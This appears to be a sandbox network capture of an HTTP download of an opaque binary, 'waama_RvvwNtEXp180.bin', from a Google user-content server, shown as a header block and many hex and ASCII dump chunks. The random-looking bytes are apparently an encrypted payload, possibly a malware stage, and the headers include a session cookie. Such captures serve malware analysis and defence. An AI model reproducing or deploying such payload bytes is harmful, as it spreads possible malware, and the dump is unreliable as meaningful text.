                                                                                                  P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info."
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Disposition: attachment;filename="waama_RvvwNtEXp180.bin";filename*=UTF-8''waama_RvvwNtEXp180.bin
                                                                                                  Content-Length: 176192
                                                                                                  Date: Wed, 24 Nov 2021 13:17:06 GMT
                                                                                                  Expires: Wed, 24 Nov 2021 13:17:06 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=cdecFw==
                                                                                                  Server: UploadServer
                                                                                                  Set-Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj; Domain=.googleusercontent.com; Expires=Wed, 24-Nov-2021 13:22:06 GMT; Path=/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj; Secure; SameSite=none; HttpOnly
                                                                                                  Set-Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn_nonce=; Domain=doc-0k-48-docs.googleusercontent.com; Expires=Tue, 23-Nov-2021 13:17:06 GMT; Path=/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj; Secure; SameSite=none; HttpOnly
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                  Connection: close
                                                                                                  2021-11-24 13:17:06 UTC191INData Raw: a0 cc d0 7b 2b ed 91 27 f3 6f 12 07 92 55 fe 80 c5 3f ba ab f1 5c 08 6a c5 53 dc 6f 75 a4 65 c5 53 55 57 a8 71 5e 6e 61 48 5b 13 8e 8a 61 5e 2a 63 12 4b b4 2c 5c bf 34 c6 3d c9 3f 85 06 50 8d 22 80 28 44 46 d7 e3 dc 4a 98 5e 66 97 08 97 62 b4 61 19 3a 73 07 0a ba 1d 3b 41 79 77 50 f2 fb c1 ef cb 99 73 83 0a 59 d5 93 7c 91 69 4c 46 07 32 0c e1 fe 90 4e 4f 63 e6 1c e1 aa e6 a6 20 f3 7e b5 2d 27 70 3f 3c d1 be ed ee f0 89 37 3a 82 60 bd 2b 70 08 b1 52 c2 5d 2b 9e 12 86 bb 7e f8 6a 87 40 4c 12 d6 85 a9 17 32 5e c6 95 3d 2b d2 5b b8 55 cf e7 5a ab c2 9c 0e 84 1c f2 74 17 1c af b2 a0 0c e1 5f 8a c5 d5 d1 f3 fc e5 3c 29 28 6f 56 f3 a1 aa d3 ce 1d 35 e4 6d 5f ab 63 09 82 70 ba 85 fa 52 06 0a c9 e8 f3 07 fa 02 54 3e 86 33 4a 03 5d 94 85 83 7d b1 68 c4 40 be 73 83
                                                                                                  Data Ascii: {+'oU?\jSoueSUWq^naH[a^*cK,\4=?P"(DFJ^fba:s;AywPsY|iLF2NOc ~-'p?<7:`+pR]+~j@L2^=+[UZt_<)(oV5m_cpRT>3J]}h@s
                                                                                                  2021-11-24 13:17:06 UTC196INData Raw: 70 e2 6e b2 7a 4c ab b7 93 df 74 68 bc 40 a0 d4 f1 97 29 26 53 a7 95 67 8d 0e 7e 48 89 05 69 04 d5 f7 fa 52 06 0a c9 e8 f3 07 a2 41 02 77 cf 2a 0f 03 5d d8 84 80 82 86 9f e8 13 29 be cb 35 bf 00 f8 36 93 11 43 54 fe 1a 25 d9 c0 f9 42 18 e2 16 29 dd 17 2c 10 5a c7 66 75 2b 20 c2 9e 5b 00 24 10 a6 c5 fd df 87 b3 54 5a f2 b3 ce 88 69 58 e3 8b d1 8a 19 a2 63 34 8e b2 cd 10 5f fe d3 29 71 db 1c 95 da a9 aa d9 3b 24 9c eb 7d a5 ba 52 c5 2b 96 e3 f2 5f de 5e 41 1c 04 d9 3a 8f c1 30 39 04 7f 33 13 fa 52 b2 9f 07 af ef 02 14 c8 b5 67 1d f4 be 28 d0 e8 1b e6 18 5d 3e 73 97 82 0e 16 42 64 8e 52 39 f8 2c f5 5b c6 ff 9f 25 be 7a f2 59 19 ea 5b 8e 3d 91 54 ba 2b 64 2e 1d 24 3d d8 6b 28 d2 0e 41 11 c8 d2 c7 0e 6f 59 c7 60 a2 a9 a7 a6 16 7e 1d 8b b1 f3 03 09 51 c5 da 55
                                                                                                  Data Ascii: pnzLth@)&Sg~HiRAw*])56CT%B),Zfu+ [$TZiXc4_)q;$}R+_^A:093Rg(]>sBdR9,[%zY[=T+d.$=k(AoY`~QU
                                                                                                  2021-11-24 13:17:06 UTC200INData Raw: 43 64 8c 52 45 f6 6c f5 46 b7 b7 9f 8e b6 7a f2 47 3b aa 5b 96 2d b1 54 bb 2b 6c 2e c1 da 47 de bd 02 92 0e 91 29 88 d2 a3 2c 2f 59 d7 44 e2 a9 8a 90 5e 7e 4d a9 f1 f3 d5 1d 11 c5 ae 45 d4 f2 4c 9a d5 b6 82 bb f9 00 78 c1 76 72 f0 d2 2a 14 41 23 32 25 6a f0 76 e1 a1 1e 27 0d 56 a4 94 c8 89 9a 49 91 2a c6 7c 47 9f 46 b5 24 5d 9b 19 18 4b 7b 87 c7 3b 1d 8e 66 53 3c 67 d4 36 f0 fa f4 51 95 c1 52 eb a9 5c 1a dd fa 10 e2 10 81 6a ae db b9 c9 d7 88 e4 e1 7f fb 44 fc 65 0c 55 eb 27 0d ea df c6 5c c8 e5 ee cc 6c f0 d7 43 06 de bd 84 f6 6c df 93 6f 0a 8c d2 89 db ad ee f4 2a 43 2a e0 68 f5 61 5e e7 7d b1 f8 ac 5e 28 61 74 b3 0b 77 86 7b cd 04 ae da cf 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 c4 ea 53 d2 65 e4 9b 2f 07 f0 6d ab 33 91 82 3d a6 63 dd
                                                                                                  Data Ascii: CdRElFzG;[-T+l.G),/YD^~MELxvr*A#2%jv'VI*|GF$]K{;fS<g6QR\jDeU'\lClo*C*ha^}^(atw{9lnW4Y+.hSe/m3=c
                                                                                                  2021-11-24 13:17:06 UTC203INData Raw: f0 97 29 26 53 47 b4 27 8d f1 c8 d9 1c e4 32 30 ba 85 fa 52 06 2e b8 a8 f3 07 fa 02 54 ae a9 23 0f 00 5d d8 84 80 7d 4a ae 17 e9 be 73 82 73 34 39 69 70 1c 0b 6a 48 c4 af 48 6f 56 be c7 db ac 80 ab 9d a3 d6 8f 08 a7 1c 14 80 1a 8d ab 47 d9 42 df b7 72 f1 df 2d b3 34 76 9e b3 ce 89 e9 59 e3 8b d1 8a 19 4e 4b 74 8e 4d 32 ef a0 16 eb 69 71 db 1c 95 da a9 aa d9 3b 24 9c eb 7d 05 95 75 ca 2f 96 64 fc 13 f1 1e 46 e3 9d ab 57 41 20 58 57 04 72 32 17 f2 2b b1 d6 ae 50 09 fc 4c b0 f5 45 19 d7 80 26 a8 99 37 92 18 5d 08 7d 3f ad 4e 16 43 64 8c 52 19 d8 2c f5 a5 39 f7 9f 8c 36 7b f2 7f 19 ea 5b ce 09 d1 54 44 d4 93 d1 39 15 7d d8 a5 20 d2 0e 69 11 c8 d2 e7 0e 6f 59 37 4f e2 a9 a5 a6 1e 7e 41 a4 f1 f3 7c f2 51 c5 d9 d5 85 f2 c0 aa 95 b6 22 85 b9 00 ac fe 36 72 f4 94
                                                                                                  Data Ascii: )&SG'20R.T#]}Jss49ipjHHoVGBr-4vYNKtM2iq;$}u/dFWA XWr2+PLE&7]}?NCdR,96{[TD9} ioY7O~A|Q"6r
                                                                                                  2021-11-24 13:17:06 UTC204INData Raw: a9 ef 39 3b 9c 80 8f 76 da 3c 16 92 3f b9 5f 8f 4d 25 59 86 f3 b3 72 c8 c6 d2 3d 13 dd 58 13 87 f2 13 2f 77 ca d0 27 a6 8d f3 a8 8d 37 1c b6 7c 4d 8a 10 47 fa 07 c4 ba 17 a1 6d 09 17 bd 58 74 7b b6 23 57 9a 56 af 31 ea 57 eb 65 dc 32 39 57 56 5c b3 7f 84 9a 54 ea 2a 1f 53 3b 07 1a 9b 03 b0 08 b3 59 af ee 3f b4 d2 25 18 45 5a 96 53 01 e6 91 30 3b f7 45 d9 73 37 1d f1 c1 5a 11 99 24 18 01 7d bd 55 6d 72 72 aa e4 28 88 00 97 0b e7 67 cf 2d e5 cc 4f 46 f5 e3 31 42 35 94 1f 2d f7 bf 64 1a 1c ae 8c cc 40 ac 3b 02 c0 e4 81 5b ce 33 0d fb 76 ff c3 33 b0 c9 be 6a 2a 74 d8 5f c3 b1 98 05 6b ca be 80 d2 29 4a d5 df 39 0e 0a d7 a2 3a 57 91 ad ca 5d 65 c6 1a 3f 37 0c 0e d8 3a 16 6f da b8 44 45 d7 e3 dc 49 98 5e 66 1d 84 f2 10 3f 53 19 3a 63 07 0a ba 1e 5a 2d 15 20 39
                                                                                                  Data Ascii: 9;v<?_M%Yr=X/w'7|MGmXt{#WV1We29WV\T*S;Y?%EZS0;Es7Z$}Umrr(g-OF1B5-d@;[3v3j*t_k)J9:W]e?7:oDEI^f?S:cZ- 9
                                                                                                  2021-11-24 13:17:06 UTC205INData Raw: 8b d0 8a 1b a2 63 34 8e b2 c5 10 5a fe d3 29 71 db 1c 95 da a9 aa d9 3b 24 9d eb ef a5 bb 35 ca 2b 96 64 fc 5f de 5e 46 1c 35 ab 57 c2 a0 59 57 04 63 32 17 fa 2a f1 d5 51 95 b9 ae 27 13 d3 8a 08 60 8c 26 7a e8 17 41 8b 1b 67 0f fa 82 0e 16 43 4a b1 a9 e5 22 8c 9d 4a 61 cf 97 8d 9d 49 83 ca 15 ea 0f 9e 2d 91 54 bb 2b 6c 2e 75 7d 3c d8 a5 15 d2 3b 69 29 c8 90 e7 4b 6f 1a 87 58 a2 9a a6 e5 1e 4a 1d cd b1 c7 83 3b 51 f5 da 6d 94 b0 c0 9e 95 f2 22 b4 b9 30 ac c6 36 4b f4 a0 6a 50 fb c5 0c 26 6a 79 dc c2 e1 2a d8 a8 ec 41 ab bc 89 1b e3 b8 6a f2 83 e2 25 04 f3 50 5d 1a b3 4a 0b 4f 78 62 6d 6e bb 77 65 22 4d 95 36 c0 fa c5 51 ad c1 6a eb 9d 5c 2f a3 bc 10 a0 10 b9 6a ec db 8d c9 93 88 d4 eb 3c f2 78 fc 27 0c 62 eb 12 0d da df fe ec d6 a5 ac d4 db c0 92 43 c1 21
                                                                                                  Data Ascii: c4Z)q;$5+d_^F5WYWc2*Q'`&zAgCJ"JaI-T+l.u}<;i)KoXJ;Qm"06KjP&jy*Aj%P]JOxbmnwe"M6Qj\/j<x'bC!
                                                                                                  2021-11-24 13:17:06 UTC207INData Raw: 3f b3 6d af de 3f 86 d2 60 14 07 5a 96 53 01 e6 b0 7a 6f 1d 68 11 a2 26 be f9 e9 ba d8 6c 31 65 bd 47 e1 02 04 1c 16 c5 93 5b d4 53 ee 64 8d 48 b8 1b d1 90 02 e1 9f e1 67 fb 3f e4 31 9d 87 b3 38 29 1c ae da 8e 12 f9 75 02 c0 e4 61 3c 8e 33 0d ff 76 ff c5 33 b0 c9 b7 3a 0e 34 28 93 7c 4e 73 31 2b ca 26 f7 92 29 4a d5 df 39 0e 1a ea e2 2a f1 79 ab 8c c0 35 ea 49 88 0b 4c 02 2c 42 56 6f da b8 44 45 d7 e3 dc 4e 98 5e 66 68 b3 97 62 0c 65 18 3a 73 6b 06 ba 2c 4f be 7d 03 af f6 83 3e d7 cf 99 8d 1c 72 a6 d1 93 7c 91 69 ec 65 47 32 04 e1 f6 90 56 4f 47 e6 1c e1 aa 56 a6 20 eb 70 aa 97 29 70 87 35 1c 9f 55 ef bc 44 16 6e ea 09 c2 0b 00 7a de 35 b0 3c 46 be 71 e7 20 10 97 1e a7 d7 29 32 a4 f0 ab 3b 5b ce 68 d0 72 70 f2 32 d7 b1 ab d2 57 a6 3d b8 0e 84 1c 72 78 17
                                                                                                  Data Ascii: ?m?`ZSzoh&l1eG[SdHg?18)ua<3v3:4(|Ns1+&)J9*y5IL,BVoDEN^fhbe:sk,O}>r|ieG2VOGV p)p5UDnz5<Fq )2;[hrp2W=rx
                                                                                                  2021-11-24 13:17:06 UTC208INData Raw: e6 b4 5b 9e 29 91 a9 d2 7f 93 db 74 21 3d d8 c9 54 2d 5c 6d 1d c8 9f a3 f1 6c 19 7b ef d6 56 a4 a6 1a 6e 1d c6 85 0c 80 4d ad 4a ae aa 97 f2 e8 8e 6a b6 22 70 bd 00 ac fe 5a 06 0b c6 6e 60 04 76 ce e9 7a 8c aa f5 e1 14 db ec e0 70 af fc 76 79 f7 81 6a c6 77 84 65 42 ff 64 05 22 cf 08 2f 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 f6 f4 51 95 c1 52 eb a9 5c 1a a3 fa 06 e2 10 81 6a ae da b9 c9 d7 88 e4 9f 80 f7 41 fc 65 0c 55 e9 27 0d ea 2a c6 ec ee a5 1b d0 9d c0 d7 47 81 de bc 02 f7 6c df 92 7f 0a 0c db 7c db ad 07 f4 2d 4b 6a 85 28 b5 fc 16 58 7e 35 14 63 26 af 61 74 df 7d 77 cb 23 b3 07 ee 26 c2 41 6a 15 6c 62 98 6e f8 1f 28 37 3f a5 05 e1 d4 2c b0 04 e2 ea 4b 9a fe 86 af b6 88 88 db c6 59 dc c9 b6 c9 11 28 01 9f 1c 07 d2 e5 54 3a 42 76 b5 35 8f be 6c bd b6
                                                                                                  Data Ascii: [)t!=T-\ml{VnMJj"pZn`vzpvyjweBd"/{x&m_GeM6QR\jAeU'*Gl|-Kj(X~5c&at}w#&Ajlbn(7?,KY(T:Bv5l
                                                                                                  2021-11-24 13:17:06 UTC209INData Raw: 31 3d ca 26 f6 92 29 4b d5 df 39 0e 0a a7 5d 2f f0 79 ab 8c 34 0b aa 49 7c c2 0c 02 d8 7e 12 17 25 d4 48 45 29 87 b0 b1 37 5e 61 60 f7 87 62 24 3d e6 c2 73 fc 9e f6 a2 ce 69 79 77 50 9e 83 3e 5d 36 f0 4f 7c f1 cd f9 6c 80 b3 18 38 b9 31 36 0c ad 01 bc b1 ba 67 e6 1c e1 c6 22 59 d5 ff 70 aa 97 83 2e 8a 35 14 9f 24 f3 43 b1 12 6e ea 09 a2 7f ff 8f ca 35 b0 3c ec e0 70 e7 dd 10 e6 06 58 d7 2d 32 a4 f0 ab 43 a4 c5 f6 d1 72 78 58 68 d6 31 a2 c9 0e 86 37 bf 06 84 1c f2 18 0f e3 9b 3a fb 28 97 4b af b2 a4 73 c3 50 97 28 48 a0 f4 f0 fb 35 d9 f9 fe bd 98 87 0b 37 2a e3 55 46 8f be fd 05 34 6a f5 d8 e8 e7 13 fa 02 54 ca a4 23 0f 0b 5d bc 84 34 7d 6e ae e8 16 be 73 83 f3 2d 39 69 70 1c 0b b6 68 84 af b7 90 a9 41 9f e1 ec 80 bf 9d a3 d6 db 79 e5 1c 14 80 1a 8d 7f 97
                                                                                                  Data Ascii: 1=&)K9]/y4I|~%HE)7^a`b$=siywP>]6O|l816g"Yp.5$Cn5<pX-2CrxXh17:(KsP(H57*UF4jT#]4}ns-9iphAy
                                                                                                  2021-11-24 13:17:06 UTC211INData Raw: 7c 7a 92 aa 93 e0 23 e7 d9 dc 36 d0 fa fe 58 95 cd 52 ef f5 a3 40 cf 8e ef 17 11 81 6a ae 75 c8 b9 28 7d e4 eb 7f f2 2c 8c 9a 08 2d 14 d9 82 eb df d7 ec ef a5 6e d4 99 b8 28 2f f5 21 bd 8e e2 6c a7 b7 2f 0a 84 d3 09 db b5 06 c4 2a 43 6a c1 28 f5 b1 66 a7 7d 75 e8 ec 48 50 61 74 b3 71 76 86 7b 4c 04 ae a2 b2 3c 94 14 6c 0e 88 6e b5 57 d7 2a 7f 59 8a 99 2b 2d b0 68 f6 ea 06 ce fe 83 ef 2e f8 f6 24 99 a6 f1 e0 49 c9 11 dd 07 9f 1c 07 d2 8d ab 2b 3e f1 26 d4 4d 71 08 87 35 64 f4 8a 2e cc 9a 26 0d e7 d0 72 e7 ac 5f f3 d4 1d bc b9 d7 b9 71 98 bb 8f 0d 86 f2 15 91 c3 0e 33 32 4d 13 35 bb 0c dd 79 f0 c2 ea c0 38 91 90 e6 c3 f2 21 2f 2b a6 17 75 e0 fd 3f f6 b0 37 2b b6 b9 24 82 ef 85 f8 36 c4 82 7b fa 92 6e 13 97 a7 b2 c4 a5 b1 65 0e 6d af 53 ea 3f e2 27 d0 05 48
                                                                                                  Data Ascii: |z#6XR@ju(},-n(/!l/*Cj(f}uHPatqv{L<lnW*Y+-h.$I+>&Mq5d.&r_q32M5y8!/+u?7+$6{nemS?'H
                                                                                                  2021-11-24 13:17:06 UTC212INData Raw: f3 d6 17 db ca 6b 9f 39 83 43 ba 3b 9a 14 01 ce 0f 00 7e de 31 44 c2 42 ce 8e df d1 10 62 1e a7 22 29 c7 a3 f0 c7 37 5f 08 19 2f fc 79 f2 36 d7 21 aa 49 5f 8e 88 47 b6 84 e9 f2 74 17 1c 0a 6b 58 85 68 af 1c 00 70 ae 8b 34 94 33 78 5f d5 f0 93 58 d9 1e bf 6a 76 cd f2 b8 1e 1c 62 0a 74 c8 7a b7 5a f9 1b 89 14 7c 3f 05 01 54 3a f5 9c 42 fb a3 c9 c4 7c f2 72 51 ec 16 96 97 7d 0c 35 cc 6c 70 1c 0b d6 50 7b fd 9f 44 57 91 9f 14 ea 80 ab 9d cf ee 24 2b cf d8 ea 43 1a 78 34 68 99 42 b3 8f 8d a3 db 15 4c 30 e1 9e b9 c7 88 61 58 e7 b3 2e d0 ec a2 63 34 8e b5 c5 10 7b fe 93 77 77 db 18 95 ab f5 55 2c 3b 24 9c eb 88 a5 ba 35 ca de 96 64 fc 5f 2b 5e 46 1c 62 c7 0b 3d fe 5e 57 10 72 43 77 05 36 9d b6 ae de 8e fc 00 2a 96 05 19 c7 80 9e d0 18 76 ba 18 5d 08 7d 97 82 0e
                                                                                                  Data Ascii: k9C;~1DBb")7_/y6!I_GtkXhp43x_XjvbtzZ|?T:B|rQ}5lpP{DW$+Cx4hBL0aX.c4{wwU,;$5d_+^Fb=^WrCw6*v]}
                                                                                                  2021-11-24 13:17:06 UTC213INData Raw: 29 64 00 51 da 4d cc 96 14 6c 0e e4 4a 4a 05 ff c0 81 59 8a 6c 2f 2e b0 68 9a ce f9 f0 29 61 11 4e 07 05 21 c5 59 f4 8d 6d 36 43 f5 d1 61 1c 07 4b 9b ab 68 46 62 6e 3f 1f 1a b8 86 c0 64 01 8d 2e 39 98 4a 29 18 86 eb 18 52 d1 f2 d3 15 bc 81 d7 79 27 9c b7 8b 40 27 64 a2 2f ca 89 5f cd 4d 7f 7d 3c a1 76 72 f0 c6 ea 3a 59 dd 2b 13 82 ac 21 2f 43 ca 15 4e 40 73 35 a1 bb 37 2f da 60 b2 ec 14 54 05 c3 4c 7c a4 80 1b 3e 17 f1 5b 47 77 8e 27 43 65 3f 5a 77 ea 61 eb d2 dd 05 39 63 52 48 4c b6 0a a3 54 da 2a 3c 53 fd 0f db 9b 41 b0 3f b4 65 af 9a 3f c6 9f 38 e7 04 1a 6a dc 25 19 b0 7a 68 15 68 31 a2 6b 86 ea c2 ba 24 1c ea 65 43 47 e5 26 fb e9 c6 f2 83 a9 a2 57 ee 72 b3 08 b4 1b d5 b4 fd 4f 56 a1 67 0f 03 51 34 69 bb f3 3c 0d e3 50 54 8f 12 f9 75 12 c0 64 69 9d 8e
                                                                                                  Data Ascii: )dQMlJJYl/.h)aN!Ym6CaKhFbn?d.9J)Ry'@'d/_M}<vr:Y+!/CN@s57/`TL|>[Gw'Ce?Zwa9cRHLT*<SA?e?8j%zhh1k$eCG&WrOVgQ4i<PTudi
                                                                                                  2021-11-24 13:17:06 UTC214INData Raw: fa 76 01 0a c4 fc f3 0f fa 0a 44 c1 8b 3b 0f 0a 5d b4 f0 7f 88 49 ae e8 16 bb 63 83 6d 1f 08 2d 8f 33 7f 45 72 94 50 db c4 56 02 d7 1e f2 44 a9 f1 43 28 c0 62 e7 e7 24 9c de 8f c6 6c 99 42 df b2 62 f1 41 d8 b0 34 89 61 b6 de 88 f7 72 d2 cf 2e 7f 1c a2 63 34 8b a2 cd 50 54 e2 d3 2d 71 f8 68 6a 2f af aa d9 3b 21 8c eb e3 8f 99 59 35 47 d2 9b d6 6e 96 a1 74 18 62 df a8 ae 5f ac 57 04 72 32 13 b2 f5 bc d6 ae a7 b6 08 09 8a bd 45 3a a3 7f d3 d0 e8 77 92 e3 6d 27 09 68 9e ca 14 b7 65 77 af 28 94 d3 eb 58 c4 02 9f 8d b6 7a b1 1f e6 1f 5b 9e 2d 91 17 9f d4 99 2e 75 21 3d dc 91 df 27 07 69 11 c8 2c 83 d6 91 09 84 64 52 57 8e 6e e0 74 1d ae 44 69 81 0d 51 a9 ee aa 3e 0f a9 aa 6a 93 27 83 b9 24 ab fe 3b 4a f4 9c 6a 10 0b 7d f0 05 86 b7 d8 1d 1f 1a 84 13 13 71 9e 78
                                                                                                  Data Ascii: vD;]Icm-3ErPVDC(b$lBbA4ar.c4PT-qhj/;!Y5Gntb_Wr2E:wm'hew(Xz[-.u!='i,dRWntDiQ>j'$;Jj}qx
                                                                                                  2021-11-24 13:17:06 UTC216INData Raw: 59 c3 f3 83 72 f0 c6 ea 3d 51 dd 6f 13 c2 f2 21 2f 47 ca e8 27 e4 8d c0 a8 bb 37 2f b6 44 4d be 10 70 fa 36 c4 82 17 96 6d 3c 17 fb 58 47 7b 8e 23 67 9a 65 af 77 ea 61 eb 27 dc 05 39 63 56 6c b3 48 84 a2 54 da 2a 2c 53 7d 07 2e 9b 41 b0 3f b3 6d af de 3f 86 d2 60 18 07 5a 96 53 01 e6 b0 7a 6f 1d 68 11 a2 26 be 15 c1 fa d8 93 ce 9a 42 47 e1 02 04 1c 16 c5 93 5b d4 53 ee 78 b0 08 b8 1b d1 90 02 15 a3 a1 67 0f 03 a4 31 69 bb f3 38 29 1c ae da 8e 12 f9 75 02 c0 e4 61 68 8e 33 0d fb 76 ff c5 33 b0 c9 b7 6a 2a 74 28 6c 83 b1 8c 31 2b ca 26 f6 92 29 4a d5 df 39 0e 0a d7 a2 2a f1 79 ab 8c 34 09 aa 49 7c 37 0c 02 d8 7e 16 6f da b8 44 45 d7 e3 dc 4e 98 5e 66 68 f7 97 62 0c 61 19 3a 73 07 0a ba 5d 3b 41 79 77 50 f2 fb c1 ef cb 99 73 83 0a 59 d5 93 7c 91 69 4c 46 07
                                                                                                  Data Ascii: Yr=Qo!/G'7/DMp6m<XG{#gewa'9cVlHT*,S}.A?m?`ZSzoh&BG[Sxg1i8)uah3v3j*t(l1+&)J9*y4I|7~oDEN^fhba:s];AywPsY|iLF
                                                                                                  2021-11-24 13:17:06 UTC217INData Raw: 95 da a9 aa d9 3b 24 9c eb 7d a5 ba 35 ca 2b 96 64 fc 5f de 5e 46 1c 62 ab 57 c2 a0 59 57 04 72 32 17 fa 0a f1 d6 51 af f6 03 14 8a b5 45 19 d7 80 26 d0 e8 77 92 18 5d 08 7d 97 82 0e 16 43 64 8c 52 19 d8 2c f5 5a c6 f7 9f 8d b6 7a f2 7f 19 ea 5b 9e 2d 91 54 bb 2b 6c 2e 75 21 3d d8 a5 20 d2 0e 69 11 c8 d2 e7 0e 6f 59 87 60 a2 a9 a6 a6 1e 7e 1d 8b b1 f3 83 0d 51 c5 da 55 94 f2 c0 aa 95 b6 22 85 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 65 6a 49 dc f1 e1 1e d8 ec ec 70 ab 88 89 23 e3 81 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 95 c1 52 eb a9 5c 1a a3 fa 10 e2 10 81 6a ae db b9 c9 d7 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07 f4 2a 43 6a
                                                                                                  Data Ascii: ;$}5+d_^FbWYWr2QE&w]}CdR,Zz[-T+l.u!= ioY`~QU"6rjejIp#j%Bd]"{x&m_GeM6QR\j@eU'C!Blo*Cj
                                                                                                  2021-11-24 13:17:06 UTC218INData Raw: 6f 1d 68 11 a2 26 be 15 c1 fa d8 93 ce 9a 42 47 e1 02 04 1c 16 c5 93 5b d4 53 ee 78 b0 08 b8 1b d1 90 02 15 a3 a1 67 0f 03 a4 31 69 bb f3 38 29 1c ae da 8e 12 f9 75 02 c0 e4 61 68 8e 33 0d fb 76 ff c5 33 b0 c9 b7 6a 2a 74 28 6c 83 b1 8c 31 2b ca 26 f6 92 29 4a d5 df 39 0e 0a d7 a2 2a f1 79 ab 8c 34 09 aa 49 7c 37 0c 02 d8 7e 16 6f da b8 44 45 d7 e3 dc 4e 98 5e 66 68 f7 97 62 0c 61 19 3a 73 07 0a ba 5d 3b 41 79 77 50 f2 fb c1 ef cb 99 73 83 0a 59 d5 93 7c 91 69 4c 46 07 32 0c e1 fe 90 4e 4f 63 e6 1c e1 aa 56 a6 20 f3 70 aa 97 29 70 8b 35 1c 9f 55 ef bc 44 16 6e ea 09 ce 0b 00 7a de 35 b0 3c 46 be 71 e7 d5 10 97 1e a7 22 29 32 a4 f0 c7 37 5b 30 e6 d1 72 78 f2 36 d7 31 aa c9 57 a6 c8 b8 0e 84 1c f2 74 17 1c 66 53 a7 d7 6c df e3 4d 58 51 9a 74 68 bc 40 a0 d4
                                                                                                  Data Ascii: oh&BG[Sxg1i8)uah3v3j*t(l1+&)J9*y4I|7~oDEN^fhba:s];AywPsY|iLF2NOcV p)p5UDnz5<Fq")27[0rx61WtfSlMXQth@
                                                                                                  2021-11-24 13:17:06 UTC219INData Raw: 5f cd 4d 13 59 c3 f3 83 72 f0 c6 ea 3d 51 dd 6f 13 c2 f2 21 2f 47 ca e8 27 e4 8d c0 a8 bb 37 2f b6 44 4d be 10 70 fa 36 c4 82 17 96 6d 3c 17 fb 58 47 7b 8e 23 67 9a 65 af 77 ea 61 eb 27 dc 05 39 63 56 6c b3 48 84 a2 54 da 2a 2c 53 7d 07 2e 9b 41 b0 3f b3 6d af de 3f 86 d2 60 18 07 5a 96 53 01 e6 b0 7a 6f 1d 68 11 a2 26 be 15 c1 fa d8 93 ce 9a 42 47 e1 02 04 1c 16 c5 93 5b d4 53 ee 78 b0 08 b8 1b d1 90 02 15 a3 a1 67 0f 03 a4 31 69 bb f3 38 29 1c ae da 8e 12 f9 75 02 c0 e4 61 68 8e 33 0d fb 76 ff c5 33 b0 c9 b7 6a 2a 74 28 6c 83 b1 8c 31 2b ca 26 f6 92 29 4a d5 df 39 0e 0a d7 a2 2a f1 79 ab 8c 34 09 aa 49 7c 37 0c 02 d8 7e 16 6f da b8 44 45 d7 e3 dc 4e 98 5e 66 68 f7 97 62 0c 61 19 3a 73 07 0a ba 5d 3b 41 79 77 50 f2 fb c1 ef cb 99 73 83 0a 59 d5 93 7c 91
                                                                                                  Data Ascii: _MYr=Qo!/G'7/DMp6m<XG{#gewa'9cVlHT*,S}.A?m?`ZSzoh&BG[Sxg1i8)uah3v3j*t(l1+&)J9*y4I|7~oDEN^fhba:s];AywPsY|
                                                                                                  2021-11-24 13:17:06 UTC220INData Raw: 29 71 db 1c 95 da a9 aa d9 3b 24 9c eb 7d a5 ba 35 ca 2b 96 64 fc 5f de 5e 46 1c 62 ab 57 c2 a0 59 57 04 72 32 17 fa 0a f1 d6 51 af f6 03 14 8a b5 45 19 d7 80 26 d0 e8 77 92 18 5d 08 7d 97 82 0e 16 43 64 8c 52 19 d8 2c f5 5a c6 f7 9f 8d b6 7a f2 7f 19 ea 5b 9e 2d 91 54 bb 2b 6c 2e 75 21 3d d8 a5 20 d2 0e 69 11 c8 d2 e7 0e 6f 59 87 60 a2 a9 a6 a6 1e 7e 1d 8b b1 f3 83 0d 51 c5 da 55 94 f2 c0 aa 95 b6 22 85 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 65 6a 49 dc f1 e1 1e d8 ec ec 70 ab 88 89 23 e3 81 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 95 c1 52 eb a9 5c 1a a3 fa 10 e2 10 81 6a ae db b9 c9 d7 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07
                                                                                                  Data Ascii: )q;$}5+d_^FbWYWr2QE&w]}CdR,Zz[-T+l.u!= ioY`~QU"6rjejIp#j%Bd]"{x&m_GeM6QR\j@eU'C!Blo
